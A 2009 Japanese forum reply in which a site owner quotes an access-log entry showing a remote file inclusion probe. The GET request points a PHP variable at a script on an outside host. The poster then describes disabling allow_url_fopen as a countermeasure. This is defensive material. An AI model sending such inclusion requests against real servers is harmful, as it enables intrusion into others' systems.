Re: スパム投稿・IPアドレスブロック ( No.110 ) |
- 日時: 2009/12/06 15:11
- 名前: o6asan
- 夕べのアクセスログに以下のログが残っていて,
GET ///?_SERVER[DOCUMENT_ROOT]=http://www.beijingteacher.net/test/fid1.txt??
見に行ってみたら,fid1.txtの内容は, <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?> でした。
というわけで,RFI対策のためにallow_url_fopen = Off -------- Offにしました。 我が家のphpのバージョンは5.2.11なので,register_globalsとallow_url_includeは,もともとOffになっていました。
これだけでいいのか,よくわからないのですが......
古いAWStatsには脆弱性があったようなので,それ狙いかもしれません。
|
|